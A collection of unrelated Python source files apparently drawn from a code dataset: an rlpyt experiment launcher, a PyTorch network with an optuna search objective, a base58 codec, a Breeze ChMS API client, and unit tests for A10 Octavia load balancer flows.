return 0
if __name__ == '__main__':
run(sys.argv[1:])
|
the-stack_0_3679 | import copy
import sys
from rlpyt.utils.launching.affinity import encode_affinity, quick_affinity_code
from rlpyt.utils.launching.exp_launcher import run_experiments
from rlpyt.utils.launching.variant import VariantLevel, make_variants
args = sys.argv[1:]
assert len(args) == 2
my_computer = int(args[0])
num_computers = int(args[1])
print(f"MY_COMPUTER: {my_computer}, NUM_COMPUTERS: {num_computers}")
script = (
"rlpyt/ul/experiments/rl_from_ul/scripts/atari/train/atari_ppo_from_ul_serial.py"
)
affinity_code = quick_affinity_code(contexts_per_gpu=3)
runs_per_setting = 3
experiment_title = "ppo_from_atc_1"
variant_levels_1 = list()
variant_levels_2 = list()
# variant_levels_3 = list()
learning_rates = [1e-3]
values = list(zip(learning_rates))
dir_names = ["{}lr".format(*v) for v in values]
keys = [("pretrain", "learning_rate")]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# games = ["pong", "qbert", "seaquest", "space_invaders",
# "alien", "breakout", "frostbite", "gravitar"]
games = ["alien", "frostbite", "pong", "seaquest"]
values = list(zip(games))
dir_names = games
keys = [("env", "game")]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# variant_levels_2.append(VariantLevel(keys, values, dir_names))
# variant_levels_3.append(VariantLevel(keys, values, dir_names))
##################################################
# RL CONFIG (mostly)
n_steps = [25e6]
pretrain_algos = ["ATC"]
replays = ["20200608/15M_VecEps_B78"]
model_dirs = ["/data/adam/ul4rl/models/20200901/atari_atc_ul_single/"]
values = list(
zip(
n_steps,
pretrain_algos,
replays,
model_dirs,
)
)
dir_names = ["RlFromUl"] # TRAIN SCRIPT SPLITS OFF THIS
keys = [
("runner", "n_steps"),
("pretrain", "algo"),
("pretrain", "replay"),
("pretrain", "model_dir"),
]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# variant_levels_2.append(VariantLevel(keys, values, dir_names))
stop_conv_grads = [True]
hidden_sizes = [512]
values = list(zip(stop_conv_grads, hidden_sizes))
dir_names = ["{}_stpcnvgrd_{}hs".format(*v) for v in values]
keys = [("model", "stop_conv_grad"), ("model", "hidden_sizes")]
variant_levels_1.append(VariantLevel(keys, values, dir_names))
# variant_levels_2.append(VariantLevel(keys, values, dir_names))
variants_1, log_dirs_1 = make_variants(*variant_levels_1)
# variants_2, log_dirs_2 = make_variants(*variant_levels_2)
variants = variants_1 # + variants_2
log_dirs = log_dirs_1 # + log_dirs_2
num_variants = len(variants)
variants_per = num_variants // num_computers
my_start = my_computer * variants_per
if my_computer == num_computers - 1:
my_end = num_variants
else:
my_end = (my_computer + 1) * variants_per
my_variants = variants[my_start:my_end]
my_log_dirs = log_dirs[my_start:my_end]
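# Example of the split above (hypothetical counts): with 12 variants and 3
# computers, variants_per == 4, so computer 0 runs variants[0:4], computer 1
# runs variants[4:8], and the last computer picks up variants[8:12] plus any
# remainder when the division is not exact.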
default_config_key = "ppo_16env"
run_experiments(
script=script,
affinity_code=affinity_code,
experiment_title=experiment_title,
runs_per_setting=runs_per_setting,
variants=my_variants,
log_dirs=my_log_dirs,
common_args=(default_config_key, experiment_title),
)
|
the-stack_0_3680 | import torch
import torch.nn as nn
import physics_aware_training.digital_twin_utils
class DNN(nn.Module):
def __init__(self, input_dim, nparams, output_dim, Nunits = None, batchnorm = False, nlaf = 'relu', **kwargs):
'''
Defines configurable deep neural network with fully connected layers and a choice of
nonlinear activation functions.
Args:
input_dim (int): dimension of input layer
output_dim (int): dimension of output layer
Nunits (list of int): dimensions of hidden layers
batchnorm (bool): determines whether to use batchnorm between each hidden layer.
The order in which batchnorm is applied is:
fully connected layer - batchnorm - nonlinear activation function
nlaf (string): determines the nonlinear activation function. Choices:
'relu', 'tanh', 'sigmoid'
'''
super(DNN, self).__init__()
if Nunits == None:
Nunits = [100, 100]
self.batchnorm = batchnorm
self.nlaf = nlaf
Nunits.insert(0, input_dim + nparams)
self.layers = nn.ModuleList([])
for i in range(len(Nunits) - 1):
self.layers.append(nn.Linear(Nunits[i], Nunits[i+1]))
self.outputlayer = nn.Linear(Nunits[-1], output_dim)
if batchnorm:
self.batchnorms = nn.ModuleList([])
for i in range(len(Nunits)-1):
self.batchnorms.append(nn.BatchNorm1d(Nunits[i+1]))
def forward(self, x):
'''
Performs the forward pass through the network.
Args:
x (float tensor): inputs of dimension [batch_size, input_dim + nparams]
'''
if self.nlaf == 'relu':
nlaf = torch.relu
elif self.nlaf == 'tanh':
nlaf = torch.tanh
elif self.nlaf == 'sigmoid':
nlaf = torch.sigmoid
for i, layer in enumerate(self.layers):
x = layer(x)
if self.batchnorm:
x = self.batchnorms[i](x)
x = nlaf(x)
return self.outputlayer(x)
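# Minimal usage sketch for the DNN above (dimensions are hypothetical): a
# network that takes a 2-d input concatenated with 3 physical parameters and
# produces a 5-d output.
#
#   model = DNN(input_dim=2, nparams=3, output_dim=5, Nunits=[64, 64],
#               batchnorm=True, nlaf='tanh')
#   x = torch.randn(16, 2 + 3)   # batch of 16 [input, parameter] vectors
#   y = model(x)                 # -> tensor of shape (16, 5)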
class DNNObjective(object):
# define class to smuggle additional arguments into objective function
def __init__(self, train_loader, test_loader, dt_path,
input_dim, nparams, output_dim, **modelargs):
'''
Defines an optuna objective which optimizes hyperparameters drawn from the
distribution defined in __call__.
Args:
dt_path (string): Location at which best model will be saved
'''
self.modelargs = modelargs
self.dt_path = dt_path
self.train_loader = train_loader
self.test_loader = test_loader
self.input_dim = input_dim
self.nparams = nparams
self.output_dim = output_dim
def __call__(self, trial):
Nlayers = trial.suggest_categorical("Nlayers", [1, 2, 3, 4, 5])
lr = trial.suggest_loguniform("lr", 1e-4, 1e-1)
Nunits = []
if Nlayers == 1:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
if Nlayers == 2:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
if Nlayers == 3:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
if Nlayers == 4:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
if Nlayers == 5:
Nunits.append(int(trial.suggest_loguniform("Nunits1", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits2", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits3", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits4", 50, 1000)))
Nunits.append(int(trial.suggest_loguniform("Nunits5", 50, 1000)))
name = f"{self.dt_path}_v{trial.number}" #create name with trial index
value, model_path = physics_aware_training.digital_twin_utils.train_loop_reg_model(
self.train_loader,
self.test_loader,
name,
self.input_dim,
self.nparams,
self.output_dim,
Model = DNN,
Nunits = Nunits,
Nlayers = Nlayers,
lr = lr,
trial = trial,
**self.modelargs)
trial.set_user_attr('model_path', model_path) #save the model path string in NAS study
        return value
|
the-stack_0_3681 | # Copyright (c) 2012-2018 The Divi Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
Divi base58 encoding and decoding.
Based on https://divitalk.org/index.php?topic=1026.0 (public domain)
'''
import hashlib
# for compatibility with following code...
class SHA256:
new = hashlib.sha256
if str != bytes:
# Python 3.x
def ord(c):
return c
def chr(n):
return bytes( (n,) )
__b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
__b58base = len(__b58chars)
b58chars = __b58chars
def b58encode(v):
""" encode v, which is a string of bytes, to base58.
"""
long_value = 0
for (i, c) in enumerate(v[::-1]):
if isinstance(c, str):
c = ord(c)
long_value += (256**i) * c
result = ''
while long_value >= __b58base:
div, mod = divmod(long_value, __b58base)
result = __b58chars[mod] + result
long_value = div
result = __b58chars[long_value] + result
# Divi does a little leading-zero-compression:
# leading 0-bytes in the input become leading-1s
nPad = 0
for c in v:
if c == 0:
nPad += 1
else:
break
return (__b58chars[0]*nPad) + result
def b58decode(v, length = None):
""" decode v into a string of len bytes
"""
long_value = 0
for i, c in enumerate(v[::-1]):
pos = __b58chars.find(c)
assert pos != -1
long_value += pos * (__b58base**i)
result = bytes()
while long_value >= 256:
div, mod = divmod(long_value, 256)
result = chr(mod) + result
long_value = div
result = chr(long_value) + result
nPad = 0
for c in v:
if c == __b58chars[0]:
nPad += 1
continue
break
result = bytes(nPad) + result
if length is not None and len(result) != length:
return None
return result
def checksum(v):
"""Return 32-bit checksum based on SHA256"""
return SHA256.new(SHA256.new(v).digest()).digest()[0:4]
def b58encode_chk(v):
"""b58encode a string, with 32-bit checksum"""
return b58encode(v + checksum(v))
def b58decode_chk(v):
"""decode a base58 string, check and remove checksum"""
result = b58decode(v)
if result is None:
return None
if result[-4:] == checksum(result[:-4]):
return result[:-4]
else:
return None
def get_bcaddress_version(strAddress):
""" Returns None if strAddress is invalid. Otherwise returns integer version of address. """
addr = b58decode_chk(strAddress)
if addr is None or len(addr)!=21:
return None
version = addr[0]
return ord(version)
if __name__ == '__main__':
# Test case (from http://gitorious.org/divi/python-base58.git)
    assert get_bcaddress_version('15VjRaDX9zpbA8LVnbrCAFzrVzN7ixHNsC') == 0
_ohai = 'o hai'.encode('ascii')
_tmp = b58encode(_ohai)
assert _tmp == 'DYB3oMS'
assert b58decode(_tmp, 5) == _ohai
print("Tests passed")
|
the-stack_0_3682 | """Python wrapper for Breeze ChMS API: http://www.breezechms.com/api
This API wrapper allows churches to build custom functionality integrated with
Breeze Church Management System.
Usage:
from breeze import breeze
breeze_api = breeze.BreezeApi(
breeze_url='https://demo.breezechms.com',
api_key='5c2d2cbacg3...')
people = breeze_api.get_people();
for person in people:
    print('%s %s' % (person['first_name'], person['last_name']))
"""
__author__ = '[email protected] (Alex Ortiz-Rosado)'
import logging
import requests
from .utils import make_enum
ENDPOINTS = make_enum(
'BreezeApiURL',
PEOPLE='/api/people',
EVENTS='/api/events',
PROFILE_FIELDS='/api/profile',
CONTRIBUTIONS='/api/giving',
FUNDS='/api/funds',
PLEDGES='/api/pledges',
TAGS='/api/tags',
ACCOUNT_SUMMARY='/api/account/summary')
class BreezeError(Exception):
"""Exception for BreezeApi."""
pass
class BreezeApi(object):
"""A wrapper for the Breeze REST API."""
def __init__(self, breeze_url, api_key,
dry_run=False,
connection=requests.Session()):
"""Instantiates the BreezeApi with your Breeze account information.
Args:
breeze_url: Fully qualified domain for your organizations Breeze
service.
api_key: Unique Breeze API key. For instructions on finding your
organizations API key, see:
http://breezechms.com/docs#extensions_api
dry_run: Enable no-op mode, which disables requests from being made.
When combined with debug, this allows debugging requests
without affecting data in your Breeze account."""
self.breeze_url = breeze_url
self.api_key = api_key
self.dry_run = dry_run
self.connection = connection
# TODO(alex): use urlparse to check url format.
if not (self.breeze_url and self.breeze_url.startswith('https://') and
self.breeze_url.find('.breezechms.')):
raise BreezeError('You must provide your breeze_url as ',
'subdomain.breezechms.com')
if not self.api_key:
raise BreezeError('You must provide an API key.')
def _request(self, endpoint, params=None, headers=None, timeout=60):
"""Makes an HTTP request to a given url.
Args:
endpoint: URL where the service can be accessed.
params: Query parameters to append to endpoint url.
          headers: HTTP headers; used for authentication parameters.
timeout: Timeout in seconds for HTTP request.
Returns:
HTTP response
Throws:
BreezeError if connection or request fails."""
if headers is None:
headers = {}
headers.update({
'Content-Type': 'application/json',
'Api-Key': self.api_key}
)
if params is None:
params = {}
keywords = dict(params=params, headers=headers, timeout=timeout)
url = '%s%s' % (self.breeze_url, endpoint)
logging.debug('Making request to %s', url)
if self.dry_run:
return
response = self.connection.get(url, verify=True, **keywords)
try:
response = response.json()
except requests.ConnectionError as error:
raise BreezeError(error)
else:
if not self._request_succeeded(response):
raise BreezeError(response)
logging.debug('JSON Response: %s', response)
return response
def _request_succeeded(self, response):
"""Predicate to ensure that the HTTP request succeeded."""
if isinstance(response, bool):
return response
else:
return not (('errors' in response) or ('errorCode' in response))
def get_account_summary(self):
"""Retrieve the details for a specific account using the API key
and URL. It can also work to see if the key and URL are valid.
Returns:
JSON response. For example:
{
"id":"1234",
"name":"Grace Church",
"subdomain":"gracechurchdemo",
"status":"1",
"created_on":"2018-09-10 09:19:35",
"details":{
"timezone":"America\/New_York",
"country":{
"id":"2",
"name":"United States of America",
"abbreviation":"USA",
"abbreviation_2":"US",
"currency":"USD",
"currency_symbol":"$",
"date_format":"MDY",
"sms_prefix":"1"
}
}
}
"""
return self._request(ENDPOINTS.ACCOUNT_SUMMARY)
def get_people(self, limit=None, offset=None, details=False):
"""List people from your database.
Args:
limit: Number of people to return. If None, will return all people.
offset: Number of people to skip before beginning to return results.
Can be used in conjunction with limit for pagination.
details: Option to return all information (slower) or just names.
returns:
JSON response. For example:
{
"id":"157857",
"first_name":"Thomas",
"last_name":"Anderson",
"path":"img\/profiles\/generic\/blue.jpg"
},
{
"id":"157859",
"first_name":"Kate",
"last_name":"Austen",
"path":"img\/profiles\/upload\/2498d7f78s.jpg"
},
{
...
}"""
params = []
if limit:
params.append('limit=%s' % limit)
if offset:
params.append('offset=%s' % offset)
if details:
params.append('details=1')
return self._request('%s/?%s' % (ENDPOINTS.PEOPLE, '&'.join(params)))
def get_profile_fields(self):
"""List profile fields from your database.
Returns:
JSON response."""
return self._request(ENDPOINTS.PROFILE_FIELDS)
def get_person_details(self, person_id):
"""Retrieve the details for a specific person by their ID.
Args:
person_id: Unique id for a person in Breeze database.
Returns:
JSON response."""
return self._request('%s/%s' % (ENDPOINTS.PEOPLE, str(person_id)))
def add_person(self, first_name, last_name, fields_json=None):
"""Adds a new person into the database.
Args:
first_name: The first name of the person.
last_name: The first name of the person.
fields_json: JSON string representing an array of fields to update.
Each array element must contain field id, field type, response,
and in some cases, more information.
ie. [ {
"field_id":"929778337",
"field_type":"email",
"response":"true",
"details":{
"address": "[email protected]",
"is_private":1}
}
].
Obtain such field information from get_profile_fields() or
use get_person_details() to see fields that already exist for a specific person.
Returns:
JSON response equivalent to get_person_details()."""
params = []
params.append('first=%s' % first_name)
params.append('last=%s' % last_name)
if fields_json:
params.append('fields_json=%s' % fields_json)
return self._request('%s/add?%s' % (ENDPOINTS.PEOPLE, '&'.join(params)))
def update_person(self, person_id, fields_json):
"""Updates the details for a specific person in the database.
Args:
person_id: Unique id for a person in Breeze database.
fields_json: JSON string representing an array of fields to update.
Each array element must contain field id, field type, response,
and in some cases, more information.
ie. [ {
"field_id":"929778337",
"field_type":"email",
"response":"true",
"details":{
"address": "[email protected]",
"is_private":1}
}
].
Obtain such field information from get_profile_fields() or
use get_person_details() to see fields that already exist for a specific person.
Returns:
JSON response equivalent to get_person_details(person_id)."""
return self._request(
'%s/update?person_id=%s&fields_json=%s' % (
ENDPOINTS.PEOPLE, person_id, fields_json
))
def get_events(self, start_date=None, end_date=None):
"""Retrieve all events for a given date range.
Args:
start_date: Start date; defaults to first day of the current month.
end_date: End date; defaults to last day of the current month
Returns:
JSON response."""
params = []
if start_date:
params.append('start=%s' % start_date)
if end_date:
params.append('end=%s' % end_date)
return self._request('%s/?%s' % (ENDPOINTS.EVENTS, '&'.join(params)))
def event_check_in(self, person_id, event_instance_id):
"""Checks in a person into an event.
Args:
person_id: id for a person in Breeze database.
event_instance_id: id for event instance to check into.."""
return self._request(
'%s/attendance/add?person_id=%s&instance_id=%s' % (
ENDPOINTS.EVENTS, str(person_id), str(event_instance_id)
))
def event_check_out(self, person_id, event_instance_id):
"""Remove the attendance for a person checked into an event.
Args:
person_id: Breeze ID for a person in Breeze database.
event_instance_id: id for event instance to check out (delete).
Returns:
True if check-out succeeds; False if check-out fails."""
return self._request(
'%s/attendance/delete?person_id=%s&instance_id=%s' % (
ENDPOINTS.EVENTS, str(person_id), str(event_instance_id)
))
def add_contribution(self,
date=None,
name=None,
person_id=None,
uid=None,
processor=None,
method=None,
funds_json=None,
amount=None,
group=None,
batch_number=None,
batch_name=None):
"""Add a contribution to Breeze.
Args:
date: Date of transaction in DD-MM-YYYY format (ie. 24-5-2015)
name: Name of person that made the transaction. Used to help match up
contribution to correct profile within Breeze. (ie. John Doe)
person_id: The Breeze ID of the donor. If unknown, use UID instead of
person id (ie. 1234567)
uid: The unique id of the person sent from the giving platform. This
should be used when the Breeze ID is unknown. Within Breeze a
user will be able to associate this ID with a given Breeze ID.
(ie. 9876543)
email: Email address of donor. If no person_id is provided, used to
help automatically match the person to the correct profile.
(ie. [email protected])
street_address: Donor's street address. If person_id is not provided,
street_address will be used to help automatically
match the person to the correct profile.
(ie. 123 Sample St)
processor: The name of the processor used to send the payment. Used
in conjunction with uid. Not needed if using Breeze ID.
(ie. SimpleGive, BluePay, Stripe)
method: The payment method. (ie. Check, Cash, Credit/Debit Online,
Credit/Debit Offline, Donated Goods (FMV), Stocks (FMV),
Direct Deposit)
funds_json: JSON string containing fund names and amounts. This
allows splitting fund giving. The ID is optional. If
present, it must match an existing fund ID and it will
override the fund name.
ie. [ {
'id':'12345',
'name':'General Fund',
'amount':'100.00'
},
{
'name':'Missions Fund',
'amount':'150.00'
}
]
amount: Total amount given. Must match sum of amount in funds_json.
group: This will create a new batch and enter all contributions with
the same group into the new batch. Previous groups will be
remembered and so they should be unique for every new batch.
Use this if wanting to import into the next batch number in a
series.
batch_number: The batch number to import contributions into. Use
group instead if you want to import into the next batch
number.
batch_name: The name of the batch. Can be used with batch number or
group.
Returns:
Payment Id.
Throws:
BreezeError on failure to add contribution."""
params = []
if date:
params.append('date=%s' % date)
if name:
params.append('name=%s' % name)
if person_id:
params.append('person_id=%s' % person_id)
if uid:
params.append('uid=%s' % uid)
if processor:
params.append('processor=%s' % processor)
if method:
params.append('method=%s' % method)
if funds_json:
params.append('funds_json=%s' % funds_json)
if amount:
params.append('amount=%s' % amount)
if group:
params.append('group=%s' % group)
if batch_number:
params.append('batch_number=%s' % batch_number)
if batch_name:
params.append('batch_name=%s' % batch_name)
response = self._request('%s/add?%s' % (ENDPOINTS.CONTRIBUTIONS,
'&'.join(params)))
return response['payment_id']
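    # Example call (values are hypothetical, and `breeze_api` is an instance as
    # shown in the module docstring), splitting a $250 gift across two funds
    # using the funds_json format described above:
    #
    #   import json
    #   funds = json.dumps([
    #       {'name': 'General Fund', 'amount': '100.00'},
    #       {'name': 'Missions Fund', 'amount': '150.00'},
    #   ])
    #   payment_id = breeze_api.add_contribution(
    #       date='24-5-2015', person_id='1234567', method='Check',
    #       funds_json=funds, amount='250.00')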
def edit_contribution(self,
payment_id=None,
date=None,
name=None,
person_id=None,
uid=None,
processor=None,
method=None,
funds_json=None,
amount=None,
group=None,
batch_number=None,
batch_name=None):
"""Edit an existing contribution.
Args:
payment_id: The ID of the payment that should be modified.
date: Date of transaction in DD-MM-YYYY format (ie. 24-5-2015)
name: Name of person that made the transaction. Used to help match up
contribution to correct profile within Breeze. (ie. John Doe)
person_id: The Breeze ID of the donor. If unknown, use UID instead of
person id (ie. 1234567)
uid: The unique id of the person sent from the giving platform. This
should be used when the Breeze ID is unknown. Within Breeze a
user will be able to associate this ID with a given Breeze ID.
(ie. 9876543)
email: Email address of donor. If no person_id is provided, used to
help automatically match the person to the correct profile.
(ie. [email protected])
street_address: Donor's street address. If person_id is not provided,
street_address will be used to help automatically
match the person to the correct profile.
(ie. 123 Sample St)
processor: The name of the processor used to send the payment. Used
in conjunction with uid. Not needed if using Breeze ID.
(ie. SimpleGive, BluePay, Stripe)
method: The payment method. (ie. Check, Cash, Credit/Debit Online,
Credit/Debit Offline, Donated Goods (FMV), Stocks (FMV),
Direct Deposit)
funds_json: JSON string containing fund names and amounts. This
allows splitting fund giving. The ID is optional. If
present, it must match an existing fund ID and it will
override the fund name.
ie. [ {
'id':'12345',
'name':'General Fund',
'amount':'100.00'
},
{
'name':'Missions Fund',
'amount':'150.00'
}
]
amount: Total amount given. Must match sum of amount in funds_json.
group: This will create a new batch and enter all contributions with
the same group into the new batch. Previous groups will be
remembered and so they should be unique for every new batch.
Use this if wanting to import into the next batch number in a
series.
batch_number: The batch number to import contributions into. Use
group instead if you want to import into the next batch
number.
batch_name: The name of the batch. Can be used with batch number or
group.
Returns:
Payment id.
Throws:
BreezeError on failure to edit contribution."""
params = []
if payment_id:
params.append('payment_id=%s' % payment_id)
if date:
params.append('date=%s' % date)
if name:
params.append('name=%s' % name)
if person_id:
params.append('person_id=%s' % person_id)
if uid:
params.append('uid=%s' % uid)
if processor:
params.append('processor=%s' % processor)
if method:
params.append('method=%s' % method)
if funds_json:
params.append('funds_json=%s' % funds_json)
if amount:
params.append('amount=%s' % amount)
if group:
params.append('group=%s' % group)
if batch_number:
params.append('batch_number=%s' % batch_number)
if batch_name:
params.append('batch_name=%s' % batch_name)
response = self._request('%s/edit?%s' % (ENDPOINTS.CONTRIBUTIONS,
'&'.join(params)))
return response['payment_id']
def delete_contribution(self, payment_id):
"""Delete an existing contribution.
Args:
payment_id: The ID of the payment that should be deleted.
Returns:
Payment id.
Throws:
BreezeError on failure to delete contribution."""
response = self._request('%s/delete?payment_id=%s' % (
ENDPOINTS.CONTRIBUTIONS, payment_id
))
return response['payment_id']
def list_contributions(self,
start_date=None,
end_date=None,
person_id=None,
include_family=False,
amount_min=None,
amount_max=None,
method_ids=None,
fund_ids=None,
envelope_number=None,
batches=None,
forms=None):
"""Retrieve a list of contributions.
Args:
start_date: Find contributions given on or after a specific date
(ie. 2015-1-1); required.
end_date: Find contributions given on or before a specific date
(ie. 2018-1-31); required.
person_id: ID of person's contributions to fetch. (ie. 9023482)
include_family: Include family members of person_id (must provide
person_id); default: False.
amount_min: Contribution amounts equal or greater than.
amount_max: Contribution amounts equal or less than.
method_ids: List of method IDs.
fund_ids: List of fund IDs.
envelope_number: Envelope number.
batches: List of Batch numbers.
forms: List of form IDs.
Returns:
List of matching contributions.
Throws:
BreezeError on malformed request."""
params = []
if start_date:
params.append('start=%s' % start_date)
if end_date:
params.append('end=%s' % end_date)
if person_id:
params.append('person_id=%s' % person_id)
if include_family:
if not person_id:
raise BreezeError('include_family requires a person_id.')
params.append('include_family=1')
if amount_min:
params.append('amount_min=%s' % amount_min)
if amount_max:
params.append('amount_max=%s' % amount_max)
if method_ids:
params.append('method_ids=%s' % '-'.join(method_ids))
if fund_ids:
params.append('fund_ids=%s' % '-'.join(fund_ids))
if envelope_number:
params.append('envelope_number=%s' % envelope_number)
if batches:
params.append('batches=%s' % '-'.join(batches))
if forms:
params.append('forms=%s' % '-'.join(forms))
return self._request('%s/list?%s' % (ENDPOINTS.CONTRIBUTIONS,
'&'.join(params)))
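    # Comment-only sketch of list_contributions; `breeze_api` is an assumed,
    # already constructed client and the fund ids are hypothetical. Note that
    # list arguments such as fund_ids are joined with '-' before being sent.
    #
    #   contributions = breeze_api.list_contributions(
    #       start_date='2015-1-1',
    #       end_date='2018-1-31',
    #       person_id='9023482',
    #       include_family=True,
    #       fund_ids=['123', '456'])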
def list_funds(self, include_totals=False):
"""List all funds.
Args:
include_totals: Amount given to the fund should be returned.
Returns:
          JSON response."""
params = []
if include_totals:
params.append('include_totals=1')
return self._request('%s/list?%s' %
(ENDPOINTS.FUNDS, '&'.join(params)))
def list_campaigns(self):
"""List of campaigns.
Returns:
JSON response."""
return self._request('%s/list_campaigns' % (ENDPOINTS.PLEDGES))
def list_pledges(self, campaign_id):
"""List of pledges within a campaign.
Args:
campaign_id: ID number of a campaign.
Returns:
JSON response."""
return self._request('%s/list_pledges?campaign_id=%s' % (
ENDPOINTS.PLEDGES, campaign_id
))
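    # Comment-only sketch showing how list_campaigns and list_pledges compose;
    # `breeze_api` is an assumed client, and treating each campaign as a dict
    # with an 'id' key is an assumption about the JSON payload.
    #
    #   for campaign in breeze_api.list_campaigns():
    #       pledges = breeze_api.list_pledges(campaign_id=campaign['id'])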
def get_tags(self, folder=None):
"""List of tags
Args:
folder: If set, only return tags in this folder id
Returns:
JSON response. For example:
[
{
"id":"523928",
"name":"4th & 5th",
"created_on":"2018-09-10 09:19:40",
"folder_id":"1539"
},
{
"id":"51994",
"name":"6th Grade",
"created_on":"2018-02-06 06:40:40",
"folder_id":"1539"
},
{ ... }
]"""
params = []
if folder:
params.append('folder_id=%s' % folder)
return self._request('%s/%s/?%s' % (ENDPOINTS.TAGS, 'list_tags', '&'.join(params)))
    def get_tag_folders(self):
"""List of tag folders
Args: (none)
Returns:
JSON response, for example:
[
{
"id":"1234567",
"parent_id":"0",
"name":"All Tags",
"created_on":"2018-06-05 18:12:34"
},
{
"id":"8234253",
"parent_id":"120425",
"name":"Kids",
"created_on":"2018-06-05 18:12:10"
},
{
"id":"1537253",
"parent_id":"5923042",
"name":"Small Groups",
"created_on":"2018-09-10 09:19:40"
},
{
"id":"20033",
"parent_id":"20031",
"name":"Student Ministries",
"created_on":"2018-12-15 18:11:31"
}
]"""
        return self._request("%s/%s" % (ENDPOINTS.TAGS, "list_folders"))
def assign_tag(self,
person_id,
tag_id):
"""
        Assign a tag to a person.
        Args:
            person_id: An existing person's user id.
            tag_id: The id number of the tag to assign to the person.
        Returns:
            True or False, depending on whether the tag assignment succeeded.
"""
params = []
params.append('person_id=%s' % person_id)
params.append('tag_id=%s' % tag_id)
response = self._request('%s/assign?%s' %
(ENDPOINTS.TAGS, '&'.join(params)))
return response
def unassign_tag(self,
person_id,
tag_id):
"""
        Unassign a tag from a person.
        Args:
            person_id: An existing person's user id.
            tag_id: The id number of the tag to unassign from the person.
        Returns:
            True or False, depending on whether the tag was removed.
"""
params = []
params.append('person_id=%s' % person_id)
params.append('tag_id=%s' % tag_id)
response = self._request('%s/unassign?%s' %
(ENDPOINTS.TAGS, '&'.join(params)))
return response
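    # Comment-only sketch for tag assignment and removal; `breeze_api` is an
    # assumed client and both ids are hypothetical (get_tags() and
    # get_tag_folders() can be used to look up real ones).
    #
    #   breeze_api.assign_tag(person_id='123456', tag_id='523928')
    #   breeze_api.unassign_tag(person_id='123456', tag_id='523928')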
|
the-stack_0_3684 | # Copyright 2019, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from taskflow.patterns import linear_flow as flow
from octavia.common import constants
from octavia.common import data_models as o_data_models
from octavia.tests.unit import base
from a10_octavia.common import config_options
from a10_octavia.controller.worker.flows import a10_load_balancer_flows
from a10_octavia.tests.common import a10constants
RACK_DEVICE = {
"project_id": "project-rack-vthunder",
"ip_address": "10.0.0.1",
"device_name": "rack_vthunder",
"username": "abc",
"password": "abc",
"interface_vlan_map": {"1": {"11": {"use_dhcp": True}, "12": {"use_dhcp": True}}}
}
RACK_DEVICE_LIST = {
"project-rack-vthunder": {
"project_id": "project-rack-vthunder",
"ip_address": "10.0.0.1",
"device_name": "rack_vthunder",
"username": "abc",
"password": "abc",
"interface_vlan_map": {"1": {"11": {"use_dhcp": True}, "12": {"use_dhcp": True}}}
},
"[dev]rack_vthunder": {
"project_id": "project-rack-vthunder",
"ip_address": "10.0.0.1",
"device_name": "rack_vthunder",
"username": "abc",
"password": "abc",
"interface_vlan_map": {"1": {"11": {"use_dhcp": True}, "12": {"use_dhcp": True}}}
}
}
@mock.patch("octavia.controller.worker.v1.tasks.database_tasks.UpdateAmphoraVIPData")
class TestLoadBalancerFlows(base.TestCase):
def setUp(self):
super(TestLoadBalancerFlows, self).setUp()
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
self.conf.config(
group="controller_worker")
# amphora_driver='a10')
self.conf.config(group="nova", enable_anti_affinity=False)
self.flows = a10_load_balancer_flows.LoadBalancerFlows()
def tearDown(self):
super(TestLoadBalancerFlows, self).tearDown()
self.conf.reset()
def test_create_lb_flows(self, mock_net_driver):
lb = o_data_models.LoadBalancer(id=a10constants.MOCK_LOAD_BALANCER_ID,
project_id='project-vthunder')
(create_flow, store) = self.flows.get_delete_load_balancer_flow(lb, False, False)
self.assertIsInstance(create_flow, flow.Flow)
def test_create_lb_rack_vthunder_vlan_flow(self, mock_net_driver):
self.conf.register_opts(config_options.A10_GLOBAL_OPTS,
group=a10constants.A10_GLOBAL_CONF_SECTION)
self.conf.config(group=a10constants.A10_GLOBAL_CONF_SECTION, network_type='vlan')
target = self.flows.get_create_rack_vthunder_load_balancer_flow(
RACK_DEVICE, RACK_DEVICE_LIST, constants.TOPOLOGY_SINGLE)
self.assertIsInstance(target, flow.Flow)
def test_delete_lb_rack_vthunder_vlan_flow(self, mock_net_driver):
self.conf.register_opts(config_options.A10_GLOBAL_OPTS,
group=a10constants.A10_GLOBAL_CONF_SECTION)
self.conf.register_opts(config_options.A10_HARDWARE_THUNDER_OPTS,
group=a10constants.A10_HARDWARE_THUNDER_CONF_SECTION)
self.conf.config(group=a10constants.A10_GLOBAL_CONF_SECTION, network_type='vlan')
self.conf.config(group=a10constants.A10_HARDWARE_THUNDER_CONF_SECTION,
devices=[RACK_DEVICE])
lb = o_data_models.LoadBalancer(id=a10constants.MOCK_LOAD_BALANCER_ID,
project_id='project-rack-vthunder')
(del_flow, store) = self.flows.get_delete_load_balancer_flow(lb, False, False)
self.assertIsInstance(del_flow, flow.Flow)
|
